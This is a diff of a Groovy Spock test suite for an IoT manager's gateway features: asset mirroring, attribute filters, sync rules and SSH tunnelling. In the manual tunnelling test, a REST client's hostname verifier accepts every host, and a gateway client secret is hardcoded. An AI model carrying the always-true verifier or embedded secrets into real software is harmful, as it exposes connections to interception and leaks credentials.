+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def gatewayService = container.getService(GatewayService.class)
+    def gatewayClientService = container.getService(GatewayClientService.class)
+    def agentService = container.getService(AgentService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def clientEventService = container.getService(ClientEventService.class)
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+
+    and: "the gateway client resource"
+    def gatewayClientResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(GatewayClientResource.class)
+
+    expect: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 300)
+    }
+
+    when: "a gateway is provisioned in this manager in the building realm"
+    GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
+            .setRealm(managerTestSetup.realmBuildingName))
+
+    then: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
+      assert !isNullOrEmpty(gateway.getClientId().orElse(null))
+      assert !isNullOrEmpty(gateway.getClientSecret().orElse(null))
+    }
+
+    and: "a gateway connector should have been created for this gateway"
+    conditions.eventually {
+      assert gatewayService.gatewayConnectorMap.size() == 1
+      assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
+    }
+
+    when: "a gateway client connection is created to connect the city realm to the gateway in the building realm"
+    def gatewayConnection = new GatewayConnection(
+            managerTestSetup.realmCityName,
+            "127.0.0.1",
+            serverPort,
+            managerTestSetup.realmBuildingName,
+            gateway.getClientId().orElse(""),
+            gateway.getClientSecret().orElse(""),
+            false,
+            null,
+            Map.of("test", new GatewayAssetSyncRule()),
+            false
+            )
+    gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
+
+    then: "the gateway client should become connected"
+    conditions.eventually {
+      assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
+    }
+
+    and: "the gateway asset connection status should become CONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
+
+    and: "the assets should have been created under the gateway asset"
+    conditions.eventually {
+      def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.id).recursive(true))
+      def cityAssets = assetStorageService.findAll(new AssetQuery().realm(new RealmPredicate(managerTestSetup.realmCityName)))
+      assert gatewayAssets.size() == cityAssets.size()
+    }
+
+    when: "the gateway client is abruptly disconnected"
+    // Overwrite the client connection status to prevent reconnection
+    gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.connectionStatus = ConnectionStatus.DISCONNECTED
+    gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.channel.close()
+
+    then: "the gateway asset connection status should become DISCONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "the connection is reestablished"
+    gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.connect()
+
+    then: "the gateway asset connection status should become CONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
+
+    when: "a gateway client asset is modified"
+    MicrophoneAsset microphone1 = assetStorageService.find(managerTestSetup.microphone1Id)
+    microphone1.setName("Microphone 1 Updated")
+    microphone1.addAttributes(
+            new Attribute<>("test", NUMBER, 100d)
+            )
+    microphone1 = assetStorageService.merge(microphone1)
+
+    then: "the mirrored asset under the gateway should have also been updated"
+    conditions.eventually {
+      def mirroredMicrophone = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false))
+      assert mirroredMicrophone != null
+      assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap {
+        it.getMetaItem(READ_ONLY)
+      }.flatMap {
+        it.getValue()
+      }.orElse(false)
+      assert mirroredMicrophone.getAttribute("test").isPresent()
+      assert mirroredMicrophone.getAttribute("test").flatMap {
+        it.getValue()
+      }.orElse(0d) == 100d
+    }
+
+    when: "a gateway client asset is added"
+    MicrophoneAsset microphone2 = new MicrophoneAsset("Microphone 2")
+            .setRealm(managerTestSetup.realmCityName)
+            .setParentId(managerTestSetup.area1Id)
+            .addAttributes(
+            new Attribute<>("test", TEXT, "testValue")
+            )
+    microphone2 = assetStorageService.merge(microphone2)
+
+    then: "the new asset should have been created in the gateway and also mirrored under the gateway asset"
+    assert microphone2.id != null
+    conditions.eventually {
+      def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
+      assert mirroredMicrophone2 != null
+      assert mirroredMicrophone2.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).isPresent()
+      assert mirroredMicrophone2.getAttribute("test").flatMap {
+        it.getValue()
+      }.orElse("") == "testValue"
+    }
+
+    when: "an attempt is made to add an asset under the gateway asset"
+    def microphone3 = ValueUtil.clone(microphone1)
+            .setName("Microphone 3")
+            .setId(null)
+            .setRealm(managerTestSetup.realmBuildingName)
+            .setParentId(mapAssetId(gateway.id, managerTestSetup.area1Id, false))
+    microphone3 = assetStorageService.merge(microphone3)
+
+    then: "an exception should be thrown"
+    thrown(IllegalStateException)
+
+    when: "an asset with a type unknown on the central instance is added on the gateway"
+    // We simulate this as both edge and central are in the same instance here in the test
+    def msgEvent = new AssetEvent(
+            AssetEvent.Cause.CREATE,
+            new BuildingAsset("UnknownAssetType")
+            .setId(UniqueIdentifierGenerator.generateId()),
+            null
+            )
+    msgEvent.asset.type = "CustomBuildingAsset"
+    gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()).sendCentralManagerMessage(msgEvent)
+
+    then: "it should be added to the central instance as a thing asset"
+    conditions.eventually {
+      def mirroredCustomAssetType = assetStorageService.find(mapAssetId(gateway.id, msgEvent.asset.id, false))
+      assert mirroredCustomAssetType != null
+      assert mirroredCustomAssetType instanceof UnknownAsset
+      assert mirroredCustomAssetType.type == "CustomBuildingAsset"
+    }
+
+    when: "an attribute is updated on the gateway client"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, "test", "newValue"))
+
+    then: "the mirrored asset attribute should also be updated"
+    conditions.eventually {
+      def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
+      assert mirroredMicrophone2 != null
+      assert mirroredMicrophone2.getAttribute("test").flatMap {
+        it.getValue()
+      }.orElse("") == "newValue"
+    }
+
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
+    and: "a mirrored asset attribute is updated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(mapAssetId(gateway.id, microphone2.id, false), "test", "newerValue"))
+
+    then: "the attribute should be updated on the gateway client and the mirrored asset"
+    conditions.eventually {
+      microphone2 = assetStorageService.find(microphone2.id)
+      def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
+      assert microphone2 != null
+      assert mirroredMicrophone2 != null
+      assert microphone2.getAttribute("test").flatMap {
+        it.getValue()
+      }.orElse("") == "newerValue"
+      assert mirroredMicrophone2.getAttribute("test").flatMap {
+        it.getValue()
+      }.orElse("") == "newerValue"
+    }
+
+    when: "we subscribe to attribute events"
+    List<AttributeEvent> attributeEvents = new CopyOnWriteArrayList<>()
+    Consumer<AttributeEvent> eventConsumer = { attributeEvent ->
+      attributeEvents.add(attributeEvent)
+    }
+    clientEventService.addSubscription(AttributeEvent.class, null, eventConsumer)
+
+    and: "an attribute with an attribute link is updated on the gateway"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, true))
+
+    then: "only four attribute events should have been generated, one for each of light1 and light2 and one for each of their mirrored assets below the gateway asset"
+    delayedConditions.eventually {
+      assert attributeEvents.size() == 4
+      assert attributeEvents.any {
+        it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false)
+      }
+      assert attributeEvents.any {
+        it.id == managerTestSetup.light1Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false)
+      }
+      assert attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name && it.value.orElse(false)
+      }
+      assert attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.light1Id, false) && it.name == LightAsset.ON_OFF.name && it.value.orElse(false)
+      }
+    }
+
+    when: "a gateway client asset is deleted"
+    def deleted = assetStorageService.delete(Collections.singletonList(managerTestSetup.microphone1Id))
+
+    then: "the client asset should have been deleted and also the mirrored asset under the gateway should also be deleted"
+    assert deleted
+    conditions.eventually {
+      assert assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false)) == null
+    }
+
+    when: "attribute filters are added to the gateway connection and persisted"
+    gatewayConnection.setAttributeFilters([
+      new GatewayAttributeFilter().setMatcher(new AssetQuery().types(LightAsset.class)).setValueChange(true),
+      new GatewayAttributeFilter().setMatcher(new AssetQuery().types(PeopleCounterAsset.class).attributeNames(PeopleCounterAsset.COUNT_TOTAL.name, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name))
+      .setDelta(1.5d),
+      new GatewayAttributeFilter().setMatcher(new AssetQuery().names("Microphone 2")).setDuration("PT1M"),
+      // Ignore any other attribute
+      new GatewayAttributeFilter().setSkipAlways(true)
+    ])
+    def oldConnector = gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm())
+    gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
+
+    then: "the gateway connection IO client should have been replaced and synchronisation should be complete"
+    conditions.eventually {
+      assert gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()) != null
+      assert gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()) != oldConnector
+      GatewayConnector connector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
+      assert connector != null
+      assert !connector.initialSyncInProgress
+      assert attributeEvents.any {
+        it.id == gateway.id && it.value.get() == ConnectionStatus.CONNECTED
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute with a value change filter and the attribute value has not changed"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, true))
+
+    then: "the value should not have been forwarded to the central instance"
+    delayedConditions.eventually {
+      assert attributeEvents.any {
+        it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && it.value.orElse(false)
+      }
+      assert !attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute with a value change filter and the attribute value has changed"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, false))
+
+    then: "the value should now have been forwarded to the central instance"
+    conditions.eventually {
+      def mirroredLight2 = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.light2Id, false))
+      assert mirroredLight2 != null
+      assert !mirroredLight2.getAttribute(LightAsset.ON_OFF).flatMap {
+        it.getValue()
+      }.orElse(true)
+      assert attributeEvents.any {
+        it.id == managerTestSetup.light2Id && it.name == LightAsset.ON_OFF.name && !it.value.orElse(true)
+      }
+      assert attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.light2Id, false) && it.name == LightAsset.ON_OFF.name && !it.value.orElse(true)
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute with a delta filter and the attribute value has changed by less than delta"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.peopleCounter1AssetId, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE, 0.5d))
+
+    then: "the value should not have been forwarded to the central instance"
+    delayedConditions.eventually {
+      assert attributeEvents.any {
+        it.id == managerTestSetup.peopleCounter1AssetId && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) - 0.5d) < 0.000001d
+      }
+      assert !attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.peopleCounter1AssetId, false) && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute with a delta filter and the attribute value has changed by more than delta"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.peopleCounter1AssetId, PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE, -1.1d))
+
+    then: "the value should have been forwarded to the central instance"
+    conditions.eventually {
+      assert attributeEvents.any {
+        it.id == managerTestSetup.peopleCounter1AssetId && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) + 1.1d) < 0.000001d
+      }
+      assert attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.peopleCounter1AssetId, false) && it.name == PeopleCounterAsset.COUNT_GROWTH_PER_MINUTE.name && Math.abs(it.value.orElse(0d) + 1.1d) < 0.000001d
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute with a duration filter"
+    attributeEvents.clear()
+    microphone2 = assetStorageService.find(microphone2.id)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, MicrophoneAsset.SOUND_LEVEL, 50d))
+
+    then: "the value should have been forwarded to the central instance (as no prior value has been sent since the filter was created)"
+    conditions.eventually {
+      assert attributeEvents.any {
+        it.id == microphone2.id && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 50d) < 0.000001d
+      }
+      assert attributeEvents.any {
+        it.id == mapAssetId(gateway.id, microphone2.id, false) && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 50d) < 0.000001d
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for the same attribute before the duration filter has elapsed"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, MicrophoneAsset.SOUND_LEVEL, 60d))
+
+    then: "the value should not have been forwarded to the central instance"
+    delayedConditions.eventually {
+      assert attributeEvents.any {
+        it.id == microphone2.id && it.name == MicrophoneAsset.SOUND_LEVEL.name && Math.abs(it.value.orElse(0d) - 60d) < 0.000001d
+      }
+      assert !attributeEvents.any {
+        it.id == mapAssetId(gateway.id, microphone2.id, false) && it.name == MicrophoneAsset.SOUND_LEVEL.name
+      }
+    }
+
+    when: "an attribute event occurs in the edge gateway realm for an attribute that matches the catch all and skip filter"
+    attributeEvents.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.area1Id, Asset.NOTES, "Some test notes"))
+
+    then: "the value should not have been forwarded to the central instance"
+    delayedConditions.eventually {
+      assert attributeEvents.any {
+        it.id == managerTestSetup.area1Id && it.name == Asset.NOTES.name && "Some test notes".equals(it.value.orElse(null))
+      }
+      assert !attributeEvents.any {
+        it.id == mapAssetId(gateway.id, managerTestSetup.area1Id, false) && it.name == Asset.NOTES.name
+      }
+    }
+
+    cleanup: "Remove any subscriptions created"
+    if (clientEventService != null) {
+      clientEventService.removeSubscription(eventConsumer)
+    }
+    if (gateway != null) {
+      assetStorageService.delete([gateway.id])
+    }
+  }
+
+  /**
+   * This test requires a manager instance with tunnelling configured, so is manual for now unfortunately.
+   * Change the test url and key path to match the instance to connect to.
+   * Recommended to run profile/dev-proxy.yml profile.
+   */
+  @Ignore
+  def "Verify gateway tunnel factory"() {
+    given: "an ssh private key and the URL of a manager instance with tunnelling configured"
+    def keyPath = Paths.get(System.getProperty("user.home"), ".ssh", "test_key")
+    def tunnelSSHHost = "custom-project-test.openremote.app"
+    def tunnelSSHPort = 2222
+    def tmpDir = new File("tmp")
+    def lockFile = new File(tmpDir, "lock.file")
+
+    and: "an instance of the gateway tunnel factory is created"
+    def container = new Container(Collections.emptyMap(), Collections.emptyList())
+    def conditions = new PollingConditions(timeout: 15, delay: 1)
+    def tunnelFactory = new MINAGatewayTunnelFactory(container.EXECUTOR, Container.SCHEDULED_EXECUTOR, keyPath.toFile(), null)
+    tunnelFactory.start()
+
+    expect: "the SSH client to be ready"
+    conditions.eventually {
+      tunnelFactory.client.isStarted()
+    }
+
+    and: "A configured GatewayTunnelInfo for HTTPS on localhost:443"
+    def tunnelInfo = new GatewayTunnelInfo(Constants.MASTER_REALM,
+            "abcedf123456",
+            GatewayTunnelInfo.Type.HTTPS,
+            "localhost", 443)
+
+    and: "A completion variable for the close callback"
+    AtomicBoolean closed = new AtomicBoolean(false)
+
+    when: "Create session is called"
+    GatewayTunnelSession session = tunnelFactory.createSession(tunnelSSHHost, tunnelSSHPort, tunnelInfo, { t ->
+      closed.set(true)
+    })
+
+    then: "The session connection future should complete successfully"
+    new PollingConditions(timeout: 60).eventually {
+      assert session.getConnectFuture().isDone()
+      assert !session.getConnectFuture().isCompletedExceptionally()
+    }
+
+    then: "we keep the tunnel open for manual testing until lock file is deleted"
+    if (!tmpDir.exists()) {
+      tmpDir.mkdirs()
+    }
+    if (!lockFile.exists()) {
+      lockFile.createNewFile()
+    }
+    getLOG().info("---------------------------------------------------------------------------------")
+    getLOG().info("TEST PAUSED FOR TUNNEL TESTING")
+    getLOG().info("Delete the lock file to continue: ${lockFile.absolutePath}")
+    getLOG().info("Tunnel should be accessible at: gw-54tnxwr2oobjafque1jndh.${tunnelSSHHost}")
+    getLOG().info("---------------------------------------------------------------------------------")
+
+    while (lockFile.exists()) {
+      getLOG().info("Tunnel is open")
+      Thread.sleep(5000)
+    }
+
+    when: "we close the tunnel gracefully"
+    session.disconnect()
+
+    then: "the tunnel should be closed without error"
+    noExceptionThrown()
+
+    cleanup: "cleanup"
+    if (tunnelFactory != null) {
+      tunnelFactory.stop()
+    }
+  }
+
+  def "Verify GatewayAssetSyncRules"() {
+
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+    def delayedConditions = new PollingConditions(initialDelay: 1, delay: 1, timeout: 10)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def timerService = container.getService(TimerService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def gatewayService = container.getService(GatewayService.class)
+    def gatewayClientService = container.getService(GatewayClientService.class)
+    def agentService = container.getService(AgentService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def clientEventService = container.getService(ClientEventService.class)
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "the gateway client resource"
+    def gatewayClientResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(GatewayClientResource.class)
+
+    expect: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 300)
+    }
+
+    when: "a gateway asset is provisioned in this manager in the building realm"
+    GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
+            .setRealm(managerTestSetup.realmBuildingName))
+
+    then: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
+      assert !isNullOrEmpty(gateway.getClientId().orElse(null))
+      assert !isNullOrEmpty(gateway.getClientSecret().orElse(null))
+    }
+
+    and: "a gateway connector should have been created for this gateway"
+    conditions.eventually {
+      assert gatewayService.gatewayConnectorMap.size() == 1
+      assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
+    }
+
+    when: "a gateway client connection is created to connect the city realm to the gateway in the building realm"
+    def gatewayConnection = new GatewayConnection(
+            managerTestSetup.realmCityName,
+            "127.0.0.1",
+            serverPort,
+            managerTestSetup.realmBuildingName,
+            gateway.getClientId().orElse(""),
+            gateway.getClientSecret().orElse(""),
+            false,
+            null,
+            [
+              "*" : new GatewayAssetSyncRule().setExcludeAttributeMeta([
+                "*": [
+                  ACCESS_PUBLIC_READ.name,
+                  ACCESS_PUBLIC_WRITE.name,
+                  STORE_DATA_POINTS.name
+                ]
+              ]).setAddAttributeMeta([
+                "*": new MetaMap([new MetaItem<>(ACCESS_RESTRICTED_READ, true)])
+              ]).setExcludeAttributes([Asset.NOTES.name]),
+              "LightAsset" : new GatewayAssetSyncRule().setExcludeAttributeMeta([
+                "*": [
+                  ATTRIBUTE_LINKS.name,
+                  ACCESS_PUBLIC_WRITE.name,
+                  FORMAT.name
+                ]
+              ]).setAddAttributeMeta([
+                "onOff" : new MetaMap([
+                  new MetaItem<>(FORMAT, ValueFormat.BOOLEAN_AS_PRESSED_RELEASED())
+                ])
+              ]).setExcludeAttributes([LightAsset.COLOUR_RGB.name]).setAccessPublicRead(false)
+            ] as Map<String, GatewayAssetSyncRule>,
+            false
+            )
+    gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
+
+    then: "the gateway client should become connected"
+    conditions.eventually {
+      assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
+    }
+
+    and: "the gateway asset connection status should become CONNECTED"
+    conditions.eventually {
+      gateway = assetStorageService.find(gateway.getId())
+      assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
+
+    and: "the assets should have been created under the gateway asset"
+    conditions.eventually {
+      def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.id).recursive(true))
+      def cityAssets = assetStorageService.findAll(new AssetQuery().realm(new RealmPredicate(managerTestSetup.realmCityName)))
+      assert gatewayAssets.size() == cityAssets.size()
+    }
+
+    and: "the asset sync rules should have been applied"
+    conditions.eventually {
+      def mirroredMicrophone = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false))
+      def mirroredLight = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.light1Id, false))
+      assert mirroredMicrophone != null
+      assert mirroredLight != null
+      assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap {
+        it.getMetaItem(READ_ONLY)
+      }.flatMap {
+        it.getValue()
+      }.orElse(false)
+      assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap {
+        it.getMetaItem(ACCESS_RESTRICTED_READ)
+      }.flatMap {
+        it.getValue()
+      }.orElse(false)
+      assert !mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap {
+        it.getMetaItem(STORE_DATA_POINTS)
+      }.flatMap {
+        it.getValue()
+      }.orElse(false)
+      assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.LOCATION).flatMap {
+        it.getMetaItem(ACCESS_RESTRICTED_READ)
+      }.flatMap {
+        it.getValue()
+      }.orElse(false)
+      assert !mirroredMicrophone.getAttribute(Asset.NOTES).isPresent()
+      assert mirroredLight.getAttributes().get(LightAsset.ON_OFF).flatMap {
+        it.getMetaItem(FORMAT)
+      }.flatMap {
+        it.getValue()
+      }.map {
+        it.asPressedReleased
+      }.orElse(false) == ValueFormat.BOOLEAN_AS_PRESSED_RELEASED().asPressedReleased
+      assert !mirroredLight.getAttribute(LightAsset.COLOUR_RGB).isPresent()
+      assert mirroredLight.getAttribute(Asset.NOTES).isPresent()
+      assert !mirroredLight.isAccessPublicRead()
+    }
+  }
+
+
+  /**
+   * This test requires a manager instance with tunnelling configured, so is manual for now unfortunately.
+   * Refer to "Gateway Tunnelling Setup" in the docs for setting up the required environment.
+   *
+   * Make sure to make the relevant gateway in the central instance, and change the rest of the variables below
+   * to reflect your setup, but most of these should be unchanged if you use the same setup as the documentation.
+   */
+  @Ignore
+  def "Gateway Tunneling Edge Gateway Integration test"() {
+    given: "the container environment is started"
+
+    def sshKeyPath = Paths.get("deployment/sish/client/client")
+
+
+    def conditions = new PollingConditions(timeout: 6000, delay: 0.2)
+    // The port where this test's manager webserver will run. cannot use random ephemeral port because of
+    // its randomization, which when generating the gateway tunnel ID, will then generate a different gateway ID each time.
+    def webserverPort = 12345
+    def config = defaultConfig(webserverPort)
+    def container = startContainer(config << [(GatewayService.OR_GATEWAY_TUNNEL_SSH_KEY_FILE): sshKeyPath.toAbsolutePath().toString()], defaultServices())
+    def gatewayClientService = container.getService(GatewayClientService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+
+    and: "Central Instance information with tunnelling enabled"
+
+    def centralInstanceHostname = "localhost"
+    def centralInstancePort = 443
+    def isCentralInstanceSecure = (centralInstancePort == 443)
+    def centralInstanceRealm = managerTestSetup.realmMasterName
+    def centralInstanceAutoCloseMinutes = 2
+    def gatewayClientId = "gateway-5bpoensnt4kaoobkp1fwzo"
+    def gatewayClientSecret = "86a4fdff-3fc0-4b42-a276-82cb9862a623"
+    def gatewayAssetId = "5bPOENSnt4kaoObkP1FWZO"
+
+    def accessToken = authenticate(
+            (isCentralInstanceSecure),
+            centralInstanceHostname,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+    def gatewayResource = getClientApiTarget(serverUri((isCentralInstanceSecure), centralInstanceHostname, centralInstancePort), MASTER_REALM, accessToken).proxy(GatewayServiceResource.class)
+
+    when: "a new gateway client connection is created to connect to the central instance"
+
+    def gatewayConnection = new GatewayConnection(
+            managerTestSetup.realmCityName,
+            centralInstanceHostname,
+            centralInstancePort,
+            centralInstanceRealm,
+            gatewayClientId,
+            gatewayClientSecret,
+            (isCentralInstanceSecure),
+            null,
+            Map.of("test", new GatewayAssetSyncRule()),
+            false
+            )
+
+    gatewayClientService.setConnection(gatewayConnection)
+
+    then: "the gateway client should become connected"
+    conditions.eventually {
+      assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
+    }
+
+    and: "the gateway connection status should become CONNECTED"
+    conditions.eventually {
+      assert gatewayClientService.getConnectionStatus(managerTestSetup.realmCityName) == ConnectionStatus.CONNECTED
+    }
+
+    and: "Tunnelling is supported in this gateway"
+    assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).tunnelFactory != null
+
+    when: "We suspend the thread to allow the tunnel to settle"
+    Thread.sleep(5000)
+
+    and: "we request (from the central manager) for a new tunnel to be created"
+    def tunnelInfo = new GatewayTunnelInfo(
+            centralInstanceRealm,
+            gatewayAssetId,
+            GatewayTunnelInfo.Type.HTTP,
+            "localhost",
+            webserverPort)
+
+    def centralManagerTunnelInfo = gatewayResource.startTunnel(tunnelInfo)
+
+    then: "gateway should have been opened"
+
+    conditions.eventually {
+      def res = gatewayResource.getAllActiveTunnelInfos(null, centralInstanceRealm)
+      print(res)
+      assert Arrays.stream(res).anyMatch({ info -> info.id == tunnelInfo.getId() })
+      assert gatewayClientService.activeTunnels.mappingCount() == 1
+    }
+
+    /*
+     At this point, a gateway has been created from the central instance to the gateway that is running on this test.
+     We can now request `/auth` from the tunnel URL, and the request route would look like this:
+     This Groovy test --> Central Instance --> Sish --> Gateway Proxy --> Keycloak/Manager
+     For the "Sish --> Gateway Proxy" request to be routed correctly, we need to edit our local `/etc/hosts` file
+     to route the <tunnelid>.<tunnelSSHHost> to localhost, like this:
+     127.0.0.1       gw-5fj1sxvwwfp7wvgqgve91n.localhost
+     If that is setup, the request correctly routes through the tunnel to the gateway, and we can request the edge manager.
+     To assert proper connectivity, we are going to request a new admin token from the tunnel URL to make sure the
+     Keycloak connection works, but also request the server info, which proves that the request has reached the manager
+     webserver.
+     * */
+    and: "We request a new admin token from the tunnel URL"
+
+    def token = authenticate(true,
+            centralManagerTunnelInfo.id + "." + centralManagerTunnelInfo.hostname,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT))
+
+    when: "We request the info endpoint of the currently running manager"
+
+    String scheme = isCentralInstanceSecure ? "https" : "http"
+    String basePath = "/api/master"
+    String baseUrl = "${scheme}://$centralManagerTunnelInfo.id.$centralManagerTunnelInfo.hostname$basePath"
+    // TODO: Use WebTarget class and built in client for this
+    ResteasyClient client = ResteasyClientBuilder.newBuilder().hostnameVerifier { String h, SSLSession s ->
+      true
+    }.build()
+    ResteasyWebTarget target = (ResteasyWebTarget) client.target(baseUrl)
+
+    then: "The request should be successful"
+    conditions.eventually {
+      def info = target.proxy(StatusResource.class).getInfo()
+
+      assert info != null
+      assert info.size() > 0
     }
 
 
-    /**
-     * This test requires a manager instance with tunnelling configured, so is manual for now unfortunately.
-     * Refer to "Gateway Tunnelling Setup" in the docs for setting up the required environment.
-     *
-     * Make sure to make the relevant gateway in the central instance, and change the rest of the variables below
-     * to reflect your setup, but most of these should be unchanged if you use the same setup as the documentation.
-     */
-    @Ignore
-    def "Gateway Tunneling Edge Gateway Integration test"() {
